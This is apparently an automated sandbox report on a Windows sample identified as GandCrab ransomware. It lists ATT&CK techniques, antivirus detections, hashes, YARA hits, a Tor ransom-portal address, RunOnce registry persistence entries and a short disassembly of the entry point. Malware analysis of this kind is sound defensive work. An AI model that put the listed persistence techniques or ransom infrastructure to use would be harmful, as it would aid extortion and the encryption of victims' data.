Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\Desktop\wThN5MTIsw.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\wThN5MTIsw.exe

0_2_0F4E7490

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Replication Through Removable Media	11 Native API	11 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	1 Input Capture	11 Security Software Discovery	1 Replication Through Removable Media	1 Input Capture	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Software Packing	Security Account Manager	11 Peripheral Device Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Data Transfer Size Limits	1 Proxy	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Network Connections Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 File and Directory Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	44 System Information Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
wThN5MTIsw.exe	90%	Virustotal		Browse
wThN5MTIsw.exe	93%	ReversingLabs	Win32.Ransomware.GandCrab
wThN5MTIsw.exe	100%	Avira	TR/Dropper.Gen
wThN5MTIsw.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
34.3.ssapst.exe.32a0000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.3.wThN5MTIsw.exe.3170000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
18.2.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
32.2.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
6.2.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
0.0.wThN5MTIsw.exe.f4e0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
24.3.ssapst.exe.3b60000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
31.2.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
24.0.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
19.0.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
6.3.ssapst.exe.2f70000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
35.0.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
12.0.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
19.2.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
30.2.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
8.2.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
26.3.ssapst.exe.3830000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
12.2.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
25.3.ssapst.exe.36d0000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
15.2.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
15.3.ssapst.exe.3300000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
35.2.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
12.3.ssapst.exe.3730000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
33.2.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
17.0.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
18.3.ssapst.exe.3230000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
8.0.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
22.2.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
24.2.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
14.0.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
19.3.ssapst.exe.3520000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
25.2.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
17.2.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
8.3.ssapst.exe.30f0000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
22.0.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
4.3.ssapst.exe.38c0000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
30.0.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
14.3.ssapst.exe.3730000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
34.2.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
14.2.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
25.0.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
30.3.ssapst.exe.2fc0000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
33.3.ssapst.exe.3d30000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
2.3.ssapst.exe.3640000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
2.2.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
0.2.wThN5MTIsw.exe.f4e0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
33.0.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
34.0.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
4.2.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
4.0.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
31.0.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
15.0.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
26.0.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
2.0.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
32.3.ssapst.exe.3790000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
6.0.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
26.2.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
32.0.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
18.0.ssapst.exe.fe60000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://gdcbmuveqjsli57x.onion/cec3c1ad6b0ea08f	100%	Avira URL Cloud	malware
https://tox.chat/download.html	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ipv4bot.whatismyipaddress.com	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ipv4bot.whatismyipaddress.com/2	wThN5MTIsw.exe, 00000000.00000002.335452470.00000000008D9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/5	ssapst.exe, 00000018.00000002.585108554.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, ssapst.exe, 00000019.00000002.605561331.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/S	ssapst.exe, 00000004.00000002.382761696.0000000001018000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/)	ssapst.exe, 00000002.00000002.369878312.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/I	ssapst.exe, 00000004.00000002.382761696.0000000001018000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/QL	ssapst.exe, 00000004.00000002.382761696.0000000001018000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/g	ssapst.exe, 00000019.00000002.607798154.0000000000F31000.00000004.00000020.00020000.00000000.sdmp, ssapst.exe, 00000019.00000003.601906375.0000000000F31000.00000004.00000020.00020000.00000000.sdmp	false		high
http://gdcbmuveqjsli57x.onion/cec3c1ad6b0ea08f	wThN5MTIsw.exe, 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmp, ssapst.exe, 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000006.00000002.406483395.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000008.00000002.421052694.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000000C.00000002.445300926.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000000E.00000002.457737689.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000000F.00000002.485790617.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000012.00000002.521001527.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000013.00000002.556559672.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000018.00000002.585820146.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000019.00000002.608758289.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000001A.00000002.628251824.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000001E.00000002.654951583.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000020.00000002.682007928.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000021.00000002.703365325.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000022.00000002.734737605.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	true	Avira URL Cloud: malware	unknown
http://ipv4bot.whatismyipaddress.com/I;	ssapst.exe, 00000002.00000002.369878312.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/&	ssapst.exe, 00000018.00000002.585108554.00000000012E8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.torproject.org/	wThN5MTIsw.exe, 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmp, ssapst.exe, 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000006.00000002.406483395.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000008.00000002.421052694.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000000C.00000002.445300926.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000000E.00000002.457737689.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000000F.00000002.485790617.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000012.00000002.521001527.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000013.00000002.556559672.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000018.00000002.585820146.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000019.00000002.608758289.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000001A.00000002.628251824.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000001E.00000002.654951583.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000020.00000002.682007928.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000021.00000002.703365325.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000022.00000002.734737605.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/G%b	ssapst.exe, 00000002.00000002.369878312.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/x	ssapst.exe, 00000018.00000002.585108554.00000000012E8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/	ssapst.exe, 00000019.00000003.601906375.0000000000F31000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tox.chat/download.html	wThN5MTIsw.exe, 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmp, ssapst.exe, 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000006.00000002.406483395.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000008.00000002.421052694.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000000C.00000002.445300926.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000000E.00000002.457737689.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000000F.00000002.485790617.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000012.00000002.521001527.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000013.00000002.556559672.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000018.00000002.585820146.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000019.00000002.608758289.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000001A.00000002.628251824.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000001E.00000002.654951583.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000020.00000002.682007928.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000021.00000002.703365325.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000022.00000002.734737605.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	694565
Start date and time:	2022-08-31 23:55:56 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	wThN5MTIsw.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	37
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@21/1@17/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 99% (good quality ratio 95.1%) Quality average: 83.3% Quality standard deviation: 24.4%
HCA Information:	Successful, ratio: 99% Number of executed functions: 72 Number of non-executed functions: 98
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:57:05	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce qxcdehgjaib "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
23:57:14	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce qxcdehgjaib "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
23:57:24	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce ocipuxittak "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
23:57:32	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce trtwjkdvbrs "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
23:57:40	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce ftylkauykkg "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
23:57:48	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce biktigczvpq "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
23:57:57	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce rjjumyjxpew "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
23:58:05	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce ypcrxwqpxuk "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
23:58:14	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce qtytdguwutr "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
23:58:28	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce ocipuxittak "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
23:58:37	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce trtwjkdvbrs "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
23:58:45	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce ftylkauykkg "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
23:58:55	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce biktigczvpq "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
23:59:04	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce rjjumyjxpew "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
23:59:12	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce ypcrxwqpxuk "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
23:59:21	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce qtytdguwutr "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
23:59:32	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce hdwqlmoiwuh "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
23:59:40	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce hedsypabrrz "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
23:59:49	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce hdwqlmoiwuh "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
23:59:58	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce hedsypabrrz "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe

Download File

Process:	C:\Users\user\Desktop\wThN5MTIsw.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	71680
Entropy (8bit):	6.4901994599792285
Encrypted:	false
SSDEEP:	1536:eZZZZZZZZZZZZpXzzzzzzzzzzzzADypczUk+lkZJngWMqqU+2bbbAV2/S2OvvdZl:9d5BJHMqqDL2/Ovvdr
MD5:	C99BAB5FEA91C0938D1D5B6684158B24
SHA1:	ECD22F94099A54544BA148AE4F53B6B52FB61573
SHA-256:	48BB3CA46BEF3D18611DCD134BAE27C277FF007E2D486CC46B17ECBDA3981429
SHA-512:	76FE6196B411FDBD88053502CCE6494B9F995277FEF67406BE5143B72E1832D039E1B90D15E9490BC238DD7EF3DF3C37D7C62B71E495811437AA3C5ECB5D3000
Malicious:	true
Yara Hits:	Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe, Author: ReversingLabs
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This .....Ym cannot be run in DOS mode....$....................}.....B.....B...........1.......Y...G.....~.....y.....\|....Rich...................PE..L....6.Z............................ K.......................................Z....... ....@.........................P...U............@.......................P.......................................................................................text...H........................... ..`.rdata..&q.......r..................@..@.data........ ......................@....CRT.........0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.4900942221998115
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	wThN5MTIsw.exe
File size:	71680
MD5:	1813521f3884de8427728b54b5c9a391
SHA1:	874f4efd9b2ba64fa3bcb6ae87b116bd526b85c3
SHA256:	4e705159b6c3a72b2b160486b9d582f05e34cd89a767428ef47ff6562b39619e
SHA512:	d640a17b59a7a23d9353339a97a174c4de4fdc7f96e813f30d0d3f687f5e67df933d90f1c7de614ce82686eb6d0dad37680cf6d1b314a04c49de0802b8329705
SSDEEP:	1536:oZZZZZZZZZZZZpXzzzzzzzzzzzzADypczUk+lkZJngWMqqU+2bbbAV2/S2OvvdZl:nd5BJHMqqDL2/Ovvdr
TLSH:	FC636C1DB2D1B293F1E396B9FAB57E25445D2D103B056BEB08A369F568220F16C3B703
File Content Preview:	MZ......................@...............................................!..L.!This :.@i.hm cannot be run in DOS mode....$.........................}.......B.......B...............1.........Y.....G.......~.......y.......\|.....Rich....................PE..L..

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x10004b20
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH
Time Stamp:	0x5A9C3687 [Sun Mar 4 18:10:15 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	8735e6cad23590d9b5b60978db488a28

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 4Ch
push 000003E8h
call dword ptr [1000A098h]
call 00007FF6F49E256Fh
test eax, eax
je 00007FF6F49E28DAh
push 00000000h
call dword ptr [1000A168h]
push 00000000h
push 00000000h
push 00000000h
push 10002D30h
push 00000000h
push 00000000h
call dword ptr [1000A108h]
mov dword ptr [ebp-04h], eax
cmp dword ptr [ebp-04h], 00000000h
je 00007FF6F49E28FEh
push 00001388h
mov eax, dword ptr [ebp-04h]
push eax
call dword ptr [1000A080h]
cmp eax, 00000102h
jne 00007FF6F49E28DEh
push 00000000h
mov ecx, dword ptr [ebp-04h]
push ecx
call dword ptr [1000A094h]
mov edx, dword ptr [ebp-04h]
push edx
call dword ptr [1000A10Ch]
call 00007FF6F49E2604h
call 00007FF6F49E1FEFh
lea ecx, dword ptr [ebp-4Ch]
call 00007FF6F49E4287h
mov dword ptr [ebp-24h], 00000000h
mov dword ptr [ebp-20h], 00000000h
mov dword ptr [ebp-18h], 00000000h
mov dword ptr [ebp-28h], 00000000h
lea eax, dword ptr [ebp-20h]
push eax
lea ecx, dword ptr [ebp-24h]
push ecx
lea edx, dword ptr [ebp-28h]
push edx
lea eax, dword ptr [ebp-18h]
push eax
lea ecx, dword ptr [ebp-4Ch]
call 00007FF6F49E4203h
mov dword ptr [ebp-2Ch], 00000000h
mov dword ptr [ebp-0Ch], 00000000h
mov ecx, dword ptr [ebp-18h]
call 00007FF6F49E27EDh

Rich Headers

Programming Language:

[ C ] VS2013 build 21005
[IMP] VS2008 SP1 build 30729
[EXP] VS2013 build 21005
[RES] VS2013 build 21005
[LNK] VS2013 build 21005

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x10550	0x55	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x105a8	0xb4	.rdata
